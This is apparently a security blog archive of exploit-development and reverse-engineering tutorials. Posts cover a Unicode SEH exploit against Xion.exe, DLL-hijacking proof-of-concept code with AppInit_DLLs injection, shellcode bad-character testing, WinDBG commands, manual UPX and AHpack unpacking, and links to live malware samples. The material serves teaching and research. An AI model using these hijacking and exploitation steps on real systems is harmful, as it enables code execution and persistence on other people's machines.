!mona pc 1500

To find offset of in cyclic pattern at the time of crash
!mona findmsp

To search registers holding pop/pop/ret
!mona seh -cp unicode
seh.txt will be created under C:\Program Files\Immunity Inc\Immunity Debugger. Following is the list of address of our interest, search for string "unicode" in seh.txt.
0x00450015 : pop ebx # pop ebp # ret |startnull,unicode,# asciiprint,ascii {PAGE_EXECUTE_READ} [Xion.exe] ASLR False, Rebase: False, SafeSEH: False, OS: False, v1.0.0.121 # (C:\Program Files\r2 Studios\Xion\Xion.exe)
0x004800f5 : pop ebx # pop ebp # ret | startnull,unicode # {PAGE_EXECUTE_READ} [Xion.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.0.0.121 (C:\Program Files\r2 Studios\Xion\Xion.exe)
0x00410079 : pop edi # pop esi # ret 0x04 | startnull,unicode,asciiprint,ascii,alphanum {PAGE_EXECUTE_READ} [Xion.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.0.0.121 (C:\Program Files\r2 Studios\Xion\Xion.exe)
0x004400c0 : pop edi # pop esi # ret 0x04 | startnull,unicode {PAGE_EXECUTE_READ} [Xion.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.0.0.121 (C:\Program Files\r2 Studios\Xion\Xion.exe)
0x00470166 : pop edi # pop ebp # ret | startnull,unicode possible ansi transform(s) : 0047009A->00470161,ascii {PAGE_EXECUTE_READ} [Xion.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.0.0.121 (C:\Program Files\r2 Studios\Xion\Xion.exe)

This article is fully based on Peter Van Eeckhoutte's Unicode exploiting tutorial.

References
https://www.corelan.be/index.php/2009/11/06/exploit-writing-tutorial-part-7-unicode-from-0x00410041-to-calc/
http://www.fuzzysecurity.com/tutorials/expDev/5.html

Sunday, September 21, 2014

Finding and Exploiting DLL Injection Vulnerabilities

We need Process Monitor tool, part of sysinternals tools for finding the Vulnerability.

Loading of non-existent Dynamic Linked Libraries (DLL's) for the process under analysis can be found using below Process Monitor filter

Process Name    is                    wab.exe then                      Include
Path                        ends with      .dll then    Include
Result    is                    NAME NOT FOUND then Include

Above Filter and Snapshot shows that Login.exe couldn't find DLL's SXS.dll, CLBCATQ.dll etc.
Created DLL with following Code and rename the DLL to any of SXS.dll, CLBCATQ.dll and copy to the path from where we are executing our vulnerable binary.


#include <windows .h>
#include <stdio .h>
#include <string .h>

BOOL APIENTRY DllMain( HMODULE hModule,DWORD  fdwReason,LPVOID lpReserved)
{
 MessageBox(NULL,L"DLL Injection by Disects !",
    L"developed by Praveen Darshanam",
    MB_ICONWARNING | MB_CANCELTRYCONTINUE | MB_DEFBUTTON2);

 return TRUE;
}

Search the DLL we injected

When we execute Login.exe binary our DLL is injected and executes code present in the DLL.

To execute calculator we can use below code

    #include <windows .h>

    int exec_calc()
    {
      WinExec("calc", 0);
      exit(0);
      return 0;
    }

    BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, 
                        LPVOID lpvReserved)
    {
      exec_calc();
      return 0;
    }

Done!

Sunday, August 10, 2014

DLL Injection: Executing and Testing DLL's

DLL (Dynamic Link Library) Injection is the process of loading a DLL into target process so that code in the DLL might be executed in the context of the target process.

Example Code Snippet

How to test DLL
RUNDLL32.EXE dll_name,EntryPoint [options]

AppInit_DLLs value is found at
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows
We have to set Appinit_DLLs key value of the type REG_SZ to DLL's Path. Executables that do not link with User32.dll do not load AppInit DLLs.

NOTE: Above registry change might cause inconvenience as you might see too many pop-ups

References
http://www.exploit-db.com/exploits/14740/
http://www.exploit-db.com/papers/14813/
http://www.exploit-db.com/wp-content/themes/exploit/docs/242.pdf
http://www.ericphelps.com/batch/rundll/
http://blog.opensecurityresearch.com/2013/01/windows-dll-injection-basics.html

Tuesday, August 5, 2014

Manual Unpacking of Compressed Binaries

INTRODUCTION

In this article we will walk through manual unpacking of protected malicious Windows binaries using OllyDBG. We also need to rebuild Import Address Table (IAT) to restore the file to executable state. Most of the Anti-virus (AV) vendors flag PE packers as malicious software. There are many varieties of packer’s available, say, ASpcak, UPX, NsPack, Armadillo, Themida etc.

PACKERS

Packers reduce the physical size of an executable by compressing an executable and combine the compressed data with decompression stub into a single binary. At runtime, the decompression stub expands the original application and transfers control to the original entry point (OEP).

One of the methods that can be used to locate the original entry point (OEP) of the file is to apply break points on the following APIs:

GetLoadLibraryA

GetVersionExA

GetEnvironmentA

LoadLibraryA

GetProcAddress

IniHeap

These APIs are called by the packer’s start-up routine.

Following articles explain manual unpacking of UPX and AHpack

http://blog.disects.com/2013/12/manual-unpacking-of-upx-packed-binary.html

http://blog.disects.com/2013/12/manual-unpacking-of-ahpack01.html

REFERENCES

http://en.wikipedia.org/wiki/Executable_compression

http://www.virusbtn.com/virusbulletin/archive/2012/04/vb201204-manual-unpacking.dkb

https://www.sans.org/reading-room/whitepapers/malicious/packer-analysis-report-debugging-unpacking-nspack-34-37-packer-33428

Friday, May 2, 2014

Windows API's used by Malware

Below Windows API's are frequently used by Malware, though this is not an exhaustive list.

Anti-debugging Techniques
kerne32.CloseHandle
kernel32.GetTickCount
the byte at offset 0x02(IsDebugged) in the PEB is set(debugged) or not
Check for the NtGlobalFlags at offset 0x68 in the PEB

kernel32.GetProcAdddress
kernel32.LoadLibraryA
kernel32.OpenProcess - get handle of a given process
kernel32.VirutalAllocEx - reserves within the virtual address space of a process
kernel32.CreateRemoteThread - create Thread (inside a process)

FindResource
LockResource
ShellExecute
GetThreadContext
CreateProcessA
ReadProcessMemory
WriteProcessMemory
NtQueueApcThread
CreateToolhelp32Snapshot
Thread32First
Thread32Next
SetWindowsHookEx
NtSetSystemInformation
CreateFile

File handling functions
Registry handling function
Network communication API's

Tutorial for learning Malware analysis
https://noppa.aalto.fi/noppa/kurssi/t-110.6220/luennot

Friday, April 18, 2014

Exploitation: Identifying Bad Characters in a Shellcode

Characters which breaks the execution of a Shell code might be considered as Bad Characters.

Before delving deep, we should understand what Shellcode is
http://en.wikipedia.org/wiki/Shellcode

To find out what are the bad characters for the specific application which we are trying to exploit, generate a byte array between 0x00 and 0xff which can be done using Immunity Debugger
!mona bytearray

Copy the generated Byte Array as part of the shell code i.e. after the NOP (\x90) sled. Exploit the Vulnerable application and at the time of crash see the alignment of the Byte Array. If there is an alignment issue at some byte or some missing byte between 0x00 and 0xff is the Bad Characters. Once we find the Bad Character remove the character from the byte array and try to exploit the application with new shellcode. Repeat the step till 0xff is reached.

Common Bad Characters
0x00 NULL (\0)
0x09 Tab (\t)
0x0a Line Feed (\n)
0x0d Carriage Return (\r)
0xff Form Feed (\f)

Wrote small program to generate Hex Numbers
******************************************
root@kali-arpman:~# cat hex_numbers.c
#include //use stdio.h and stdlib.h, some html embedding issue
#include
void main()
{
   int x=0,i;

   printf("disects: Generate 0x00 to 0xff Hex Numbers\n");
   for(i = 0;i<=255; i++)
   {
       if(i%8 == 0 && i>=8)
           printf("\n");

       printf("%#.2x ", i);
   }

   printf("\n");
}
root@kali-arpman:~# gcc hex_numbers.c -o hex_numbers
root@kali-arpman:~#
root@kali-arpman:~#
root@kali-arpman:~# ./hex_numbers
disects: Generate 0x00 to 0xff Hex Numbers
00 0x01 0x02 0x03 0x04 0x05 0x06 0x07
0x08 0x09 0x0a 0x0b 0x0c 0x0d 0x0e 0x0f
0x10 0x11 0x12 0x13 0x14 0x15 0x16 0x17
0x18 0x19 0x1a 0x1b 0x1c 0x1d 0x1e 0x1f
0x20 0x21 0x22 0x23 0x24 0x25 0x26 0x27
0x28 0x29 0x2a 0x2b 0x2c 0x2d 0x2e 0x2f
0x30 0x31 0x32 0x33 0x34 0x35 0x36 0x37
0x38 0x39 0x3a 0x3b 0x3c 0x3d 0x3e 0x3f
0x40 0x41 0x42 0x43 0x44 0x45 0x46 0x47
0x48 0x49 0x4a 0x4b 0x4c 0x4d 0x4e 0x4f
0x50 0x51 0x52 0x53 0x54 0x55 0x56 0x57
0x58 0x59 0x5a 0x5b 0x5c 0x5d 0x5e 0x5f
0x60 0x61 0x62 0x63 0x64 0x65 0x66 0x67
0x68 0x69 0x6a 0x6b 0x6c 0x6d 0x6e 0x6f
0x70 0x71 0x72 0x73 0x74 0x75 0x76 0x77
0x78 0x79 0x7a 0x7b 0x7c 0x7d 0x7e 0x7f
0x80 0x81 0x82 0x83 0x84 0x85 0x86 0x87
0x88 0x89 0x8a 0x8b 0x8c 0x8d 0x8e 0x8f
0x90 0x91 0x92 0x93 0x94 0x95 0x96 0x97
0x98 0x99 0x9a 0x9b 0x9c 0x9d 0x9e 0x9f
0xa0 0xa1 0xa2 0xa3 0xa4 0xa5 0xa6 0xa7
0xa8 0xa9 0xaa 0xab 0xac 0xad 0xae 0xaf
0xb0 0xb1 0xb2 0xb3 0xb4 0xb5 0xb6 0xb7
0xb8 0xb9 0xba 0xbb 0xbc 0xbd 0xbe 0xbf
0xc0 0xc1 0xc2 0xc3 0xc4 0xc5 0xc6 0xc7
0xc8 0xc9 0xca 0xcb 0xcc 0xcd 0xce 0xcf
0xd0 0xd1 0xd2 0xd3 0xd4 0xd5 0xd6 0xd7
0xd8 0xd9 0xda 0xdb 0xdc 0xdd 0xde 0xdf
0xe0 0xe1 0xe2 0xe3 0xe4 0xe5 0xe6 0xe7
0xe8 0xe9 0xea 0xeb 0xec 0xed 0xee 0xef
0xf0 0xf1 0xf2 0xf3 0xf4 0xf5 0xf6 0xf7
0xf8 0xf9 0xfa 0xfb 0xfc 0xfd 0xfe 0xff
root@kali-arpman:~#
******************************************

When testing an application append 0x01-0xff part of the buffer leading to crash, once the application crashes observe the characters
0:000> d 0013e0e0
0013e0e0 cc eb 10 90 71 47 01 10-01 02 03 04 05 06 07 08 ....qG..........
0013e0f0 09 0a 0b 0c 0d 0e 0f 10-11 12 13 14 15 16 17 18 ................
0013e100 19 1a 1b 1c 1d 1e 1f 20-21 22 23 24 25 26 27 28 ....... !"#$%&'(
0013e110 29 2a 2b 2c 2d 2e 2f 30-31 32 33 34 35 36 37 38 )*+,-./012345678
0013e120 39 3a 3b 3c 3d 3e 3f 40-41 42 43 44 45 46 47 48 9:;<=>?@ABCDEFGH
0013e130 49 4a 4b 4c 4d 4e 4f 50-51 52 53 54 55 56 57 58 IJKLMNOPQRSTUVWX
0013e140 59 5a 5b 5c 5d 5e 5f 60-61 62 63 64 65 66 67 68 YZ[\]^_`abcdefgh
0013e150 69 6a 6b 6c 6d 6e 6f 70-71 72 73 74 75 76 77 78 ijklmnopqrstuvwx
0013e160 79 7a 7b 7c 7d 7e 7f 3f-81 3f 3f 3f 3f 3f 3f 3f yz{|}~.?.???????
0013e170 3f 3f 3f 3f 8d 3f 8f 90-3f 3f 3f 3f 3f 3f 3f 3f ????.?..????????
0013e180 3f 3f 3f 3f 9d 3f 3f a0-a1 a2 a3 a4 a5 a6 a7 a8 ????.??.........
0013e190 a9 aa ab ac ad ae af b0-b1 b2 b3 b4 b5 b6 b7 b8 ................
0013e1a0 b9 ba bb bc bd be bf c0-c1 c2 c3 c4 c5 c6 c7 c8 ................
0013e1b0 c9 ca cb cc cd ce cf d0-d1 d2 d3 d4 d5 d6 d7 d8 ................
0013e1c0 d9 da db dc dd de df e0-e1 e2 e3 e4 e5 e6 e7 e8 ................
0013e1d0 e9 ea eb ec ed ee ef f0-f1 f2 f3 f4 f5 f6 f7 f8 ................
0013e1e0 f9 fa fb fc fd fe ff 90-90 90 90 90 90 90 90 90 ................
0013e1f0 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................
0013e200 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................
0013e210 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................
0013e220 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................
0013e230 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................

If we observe carefully characters 0x80,0x82 to 0x8e, 0x91 to 0x9c, 0x9e and 0x9f are probable bad characters. One of the exploit I wrote didn't work if the shellcode has above charactsrs.
http://blog.disects.com/2015/03/webgate-edvr-manager.html

Other References
http://seclists.org/basics/2011/Mar/77
http://www.offensive-security.com/metasploit-unleashed/Generating_Payloads

Other interesting posts on the blog
http://blog.disects.com/2014/04/hacking-android-devices-using.html
http://blog.disects.com/2014/04/nmap-scripting-engine-auditing-mysql.html

Saturday, April 5, 2014

WinDBG: Useful Debugging Commands

Open "Debugging Tools for Windows" help file

0:017> .hh


Display registers
0:017> r

Display Current Process
0:017> |.
0:017> |

Unassemble Function or address
0:017> uf mshtml!CElement::Doc
0:017> u address

Assemble Address
0:017> a address

Stack Trace
0:017> knL

Display Stack Backtrace
0:017> k
Trace (t) command executes a single instruction or source line and optionally displays the resulting values of all registers and flags.
0:017> t


Set break point
0:017> bp address

List break points
0:017> bl

Search for a String
0:017> s -a 0x00000000 L?7fffffff "disects"

dll is loaded between 03b10000 and 03fd000, search this area for 5d c3
0:014> s 03b10000 l 03fdd000 5d c3

On Intel machines, looking at the disassembled SEH code, you will see an instruction to move DWORD ptr from FS:[0]. This ensures that the exception handler is set up for the thread and will be able to catch errors when they occur. The opcode for this instruction is 64A100000000. If you cannot find this opcode, the
application/thread may not have exception handling at all.
Dump the TEB
0:017> d fs:[0]

Displays the current exception handler chain
0:017> !exchain

Display information about a local variable, global variable or data types(structures and unions). 
0:017> dt var1

array(arr1) under var1
0:017> dt var1 -a arr1

displays all types and globals under nt
0:017> dt nt!*

Looking at the default process heap, shows percentage of busy blocks
0:017> !heap -stat -h 00150000

Listing allocations with specific size
0:017> !heap -flt s fffe0

Display data at an address or a register
0:017> d 03694024-10

0:017> d esp
To which heap entry a particular address (here, 0c0c0c0c) belongs to
0:017> !heap -p -a 0c0c0c0c

Refer blow link for further reference

http://windbg.info/doc/1-common-cmds.html

Wednesday, December 18, 2013

Manual Unpacking of UPX Packed Binary File

FileName: calc.exe
MD5: 829e4805b0e12b383ee09abdc9e2dc3c
File Size: 114688
Source: C:\WINDOWS\system32
OS Used: Windows XP Pro SP3 (English)

Create UPX Packed binary using below command
upx -9 -o calc_upx9.exe calc.exe

File Size after packing is 57856 bytes

Packer Info

Lets start unpacking, load the file to OllyDBG. OllyDBG detects and warns about the Packer, ignore the message (click NO).

0x01020250 is the current Entry Point

01020250 60 PUSHAD

Real OEP = OEP find in Olly - Image Base

Real OEP = 0x01020250 - 0x01000000

After ignoring the warning, step over (F8) POPAD, right click on ESP(0x0006FFA4) and follow in dump.

POPAD will push all the REGISTERs values onto Stack.

In the dump window select first 2/4 bytes and go for a hardware breakpoint on access as shown below. First 4 bytes selected is the value of EDI Register on Stack in little endian format.

Run the binary (F9) after setting the breakpoint, will stop execution when hits a break point (0x010203CE). When breakpoint is hit the CPU is

010203CD 61 POPAD

010203CE 8D4424 80 LEA EAX,DWORD PTR SS:[ESP-80]

010203D2 6A 00 PUSH 0

010203D4 39C4 CMP ESP,EAX

010203D6 ^75 FA JNZ SHORT calc_upx.010203D2

010203D8 83EC 80 SUB ESP,-80

010203DB -E9 9520FFFF JMP calc_upx.01012475

Put a breakpoint at 0x010203DB (first JUMP instruction after POPAD), press F9 and when we hit the breakpoint single step (F8) one time from JUMP, will land at

01012475 6A 70 PUSH 70

01012477 68 E0150001 PUSH calc_upx.010015E0

Right click on 0x01012475 and "Dump debugged process", copy the value in Modify text box which will be our OEP and click on Dump button which will create a new binary (dump_test.exe here).

dump_test.exe is not executable since it doesn't have proper Import Address Table (IAT). Executing the binary will throw below error

Load the original binary (calc.exe) into ImportREC, paste the OEP copied from Modify text field when creating dump file. Click on AutoSearch to automatically search IAT's. Will give below log message

Original IAT RVA found at: 0000120C in Section RVA: 00001000 Size:00018000

Now click on GetImports which will throw below log if everything goes fine.

IAT read successfully.

------------------------------------------------

Current imports:

6 (decimal:6) valid module(s) (added: +6 (decimal:+6))

84 (decimal:132) imported function(s). (added: +84 (decimal:+132))

Now click on FixDump and select dump_test.exe, ImportREC will fix dump_test.exe and creata a new file dump_test_.exe, see below logs

*** New section added successfully. RVA:00029000 SIZE:00001000

Image Import Descriptor size: 78; Total length: 908

C:\Documents and Settings\praveen\Desktop\UnpackMe\upx_calc\dump_test_.exe saved successfully.

To cross verify load the newly created file into PEiD

Done :-) !!!

Manual unpacking of AHpack can be found at

http://blog.disects.com/2013/12/manual-unpacking-of-ahpack01.html

Tuesday, December 17, 2013

Manual Unpacking of AHpack(0.1) Packed Binary File

File Information
FileName: UnPackMe_!EP(EXE Pack)1.2.exe
MD5: c39d13643796db07eb9c3c90b3db71d0
File Size: 281088
Source: tuts4u
OS Used: Windows XP Pro SP3 (English)

Packer Information
Packer details can be found using tool "Detect It Easy".

Packed Binary Entry Point

Launch the binary in Debugger, I am using Immunity Debugger v1.85. Immunity will alert you stating that the binary might be Compressed, ignore the error message(click NO) and proceed further. We can see the Entry Point as

Address Opcode Instruction
0046B0FF 60 PUSHAD

PUSHAD

Step Into(F7) or Step Over(F8) PUSHAD instruction. PUSHAD willl push the values of all the General Purpose Registers to Stack, except EIP.

Hardware Breakpoint On Access

Right click on ESP(0x0012FFA4) register and click on "Follow in Dump", in the dump window select initial 2 or 4 bytes, right click "Breakpoint-> Hardware, on access->;Dword (click on it)". Will create a Hardware breakpoint.

We can also execute "hr esp-4" and command bar to set Breakpoint.
"Follow in Dump" will show little endian style register values (EDI might be the first value) on top of the stack.

0046B299 61 POPAD
0046B29A BA B0714200 MOV EDX,UnPackMe.004271B0
0046B29F -FFE2 JMP EDX ; UnPackMe.004271B0

Hits Breakpoint

Execute the binary i.e. hit F9 key. This should break at one instruction after POPAD. Why break here? Because a POPAD was executed before, this will try to access the memory marked with a breakpoint. Single step (F7) till you execute first jump instruction (at 0x0046B29F) which will actually take us to OEP and continue single stepping till we see below instructions which shows the creation of stack frame.

004271B0 55 PUSH EBP

004271B1 8BEC MOV EBP,ESP

0x004271B0 is the Original Entry Point. Long jump from 0x0046B29F to 0x004271B0, it's fairly tellable that we have reached OEP.

Dump the process by right clicking at 0x004271B0 (PUSH EBP).

Dump Process

Will pop up a window as shown, click on Dump and save it as dump.exe. Executing this file might throw "...not a valid Win32 Application" error because it doesn't have valid Import Address Table(IAT).

Fix Dumped Process
Image Base + OEP = Start Offset
Let's fix the IAT, fire "Import REC" tool and select the original binary which we are trying to Unpack. Modify the OEP to 0x000271B0 and click on AutoSearch tab, ignore the pop warning (click OK).
IAT AutoSearch feature is used to find right references to the API calls. Click on "Get Imports" to get Imports, should not have any errors(see below snapshot).

Now click on "Fix Dump" and provide dump.exe created from one of the steps above. If successful, will create an unpacked binary dump_.exe.

Execute the binary by double clicking it, if it executes without error; boom, our unpacking is done !!

The steps can be summarized as

Execution starts from new Original Entry Point (OEP) newly added code section located at the end of binary)
Saves the current Registers Status using PUSHAD (Opcode 60) instruction
All the Packed Sections are Unpacked in memory
Resolve the import table of original executable file.
Restore the original Register Status using POPAD (Opcode 61) instruction
Finally Jumps to Original Entry point to begin the actual execution

Thursday, February 23, 2012

URL's to Learn Malware Analysis, RCE

Following links will be pretty useful to learn Malware Analysis, Reverse Code Engineering(RCE) etc.

http://forum.tuts4you.com/index.php
http://www.woodmann.com/TiGa/idaseries.html
http://www.openrce.org/articles/
http://www.kernelmode.info/forum/index.php
http://crackmes.de/

Debugging Book
http://advancedwindowsdebugging.com/portal/portal_downloads.htm

Step 1: Learn C/C++/Delphi etc. You can't reverse engineer if you can't forward engineer.
Step 2: Learn x86 assembly - http://opensecuritytraining.info/IntroX86.html (includes videos)
Step 3: Learn x86 architecture - http://opensecuritytraining.info/IntermediateX86.html (includes videos)
Step 4: Learn PE binary format - http://opensecuritytraining.info/LifeOfBinaries.html (includes videos)
Step 5: Learn about IDA & general RE thought process - http://opensecuritytraining.info/IntroductionToReverseEngineering.html (video pending)
Step 6: Learn about some stealth malware techniques - http://opensecuritytraining.info/Rootkits.html (includes videos)
Step 7: Learn more by encouraging other people to submit their own class material - http://opensecuritytraining.info/Why.html
http://opensecuritytraining.info/Training.html

check it out: http://www.accessroot.com/arteam/site/news.php
another awesome tuts: http://portal.b-at-s.net/download.php

Some Sites
http://j00ru.vexillium.org/
http://www.analyze-v.com/
http://byteworm.com/
http://blog.zemana.com/2012/05/kaynaklar.html
http://fumalwareanalysis.blogspot.in/p/malware-analysis-tutorials-reverse.html
http://thelegendofrandom.com/blog/sample-page
http://beginners.re/

Live Malware Samples
http://www.offensivecomputing.net/
http://www.malwaredomainlist.com/
http://www.malc0de.org/database
http://www.virussign.com/index.html
http://www.vx.netlux.org/
http://openmalware.org/
http://virusshare.com/
https://twitter.com/MalwareChannel
http://www.vxheavens.com/
http://malshare.com/
https://avcaesar.malware.lu/
http://www.malwareblacklist.com/showMDL.php
https://malwr.com/
http://secuboxlabs.fr/
http://www.virusign.com/
http://virusshare.com/

Other useful sources
http://zeltser.com/combating-malicious-software/malware-sample-sources.html
http://reverseengineering.stackexchange.com/questions/206/where-can-i-as-an-individual-get-malware-samples-to-analyze
http://reverseengineering.stackexchange.com/questions/265/where-to-find-free-training-in-reverse-engineering

Suspicious files can be analyzed at
https://www.virustotal.com/

Malicious PDF Files
http://filex.jeek.org/archive_PDF.zip

Android Malware Samples
http://contagiodump.blogspot.in/
http://www.malgenomeproject.org/

For Mac OS X related resources, refer
http://darshanams.blogspot.in/2012/05/mac-os-x-infector-and-research.html

Tools
IDA/Olly/WinDBG
ImpREC
LordPE
Sysinternal's Tool Suite
Exeinfo PE/ PEiD
PEstudio
CFF Explorer
FileAlyzer
PEview

Let me know new sites, will update the same here :-) !!!